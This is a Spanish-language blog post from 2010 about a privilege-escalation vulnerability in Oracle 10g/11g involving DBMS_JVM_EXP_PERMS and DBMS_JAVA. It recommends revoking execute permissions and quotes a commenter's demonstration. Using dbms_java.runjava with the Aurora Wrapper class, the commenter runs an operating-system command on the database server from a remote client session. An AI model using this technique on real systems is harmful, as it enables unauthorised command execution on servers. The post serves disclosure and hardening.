miércoles, 10 de febrero de 2010

Ampliación sobre el tema de "Exposición de Vulnerabilidad en Oracle 10g/11g"


Gracias Enrique por tu ampliación en el tema, aquí repito tus palabras, para que la gente que sigue nuestros posts, no pierdan el hilo del asunto. Por otro lado, en el siguiente sitio OraNA, observé que lograron hacer lo mismo con la última version 11gR2, por tanto, podemos comentar, que al parecer, este problema, podría venir de hace mucho tiempo atrás, pero hasta ahora, esta "saltanto la liebre" como se dice popularmente.

Oraclue, quién publica el documento y hace alusión en su comentario a David Litchfield, quién encontró esta exposición, hace la recomendación de revocar los permisos de ejecución, no sólo al paquete en cuestión, sino también a estos otros paquetes, para evitar que la utilización de DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS, sea utilizado por parte de un usuario, para cambiar sus privilegios sobre la tablas de políticas de JAVA, permitiendo así a JVM ( Java Virtual Machine ), ejecutar comando de sistema operativo y leer o escribir archivos:

  • revoke execute on DBMS_JVM_EXP_PERMS from public;
  • revoke execute on DBMS_JAVA from public;
  • revoke execute on DBMS_JAVA_TEST from public;
"Enrique Obergozo responde:...Hola Ronald, sobre el tema, debo hacer la precision de que no es necesario estar conectado al servidor de base de datos para explotar esta vulnerabilidad, basta con que tengas como conectarte, ya sea sql*plus, sqldeveloper, toad, un programa en Java, cualquier medio, y una cuenta con privilegio de create session como mínimo, eso es todo, yo lo he probado y puedo dar fe:

Desde el server linux:
[oracle@serverXXX ~]$ ls -lt
total 12
-rw-r--r-- 1 oracle oinstall 45 Feb 9 09:26 afiedt.buf
drwxr-xr-x 4 oracle oinstall 4096 Jan 12 10:13 scripts
drwxr----- 3 oracle oinstall 4096 Dec 30 09:58 oradiag_oracle

Desde un sql*plus en Windows Vista:
TEST@bdXXX > select dbms_java.runjava('oracle/aurora/util/Wrapper /bin/mv /home/oracle/afiedt.buf /home/oracle/afiedt.BUF') from dual;

DBMS_JAVA.RUNJAVA('ORACLE/AURORA/UTIL/WRAPP
-------------------------------------------

Nuevamente en el server Linux:
[oracle@serverXXX ~]$ ls -lt
total 12
-rw-r--r-- 1 oracle oinstall 45 Feb 9 09:26 afiedt.BUF
drwxr-xr-x 4 oracle oinstall 4096 Jan 12 10:13 scripts
drwxr----- 3 oracle oinstall 4096 Dec 30 09:58 oradiag_oracle

Con esta consideracion, realmente cualquier instalacion esta abierta a la explotacion de esta vulnerabilidad, al menos de mi experiencia hay muchas instalaciones donde sencillamente se instala todo por defecto y nunca se instala patch alguno, ni siquiera los CPU, asi que es probable que esten expuestos por mucho tiempo, hasta que alguien los ataque.

No hay comentarios:

Publicar un comentario

Te agradezco tus comentarios. Te esperamos de vuelta.

Todos los Sábados a las 8:00PM

Optimismo para una vida Mejor

Optimismo para una vida Mejor
Noticias buenas que comentar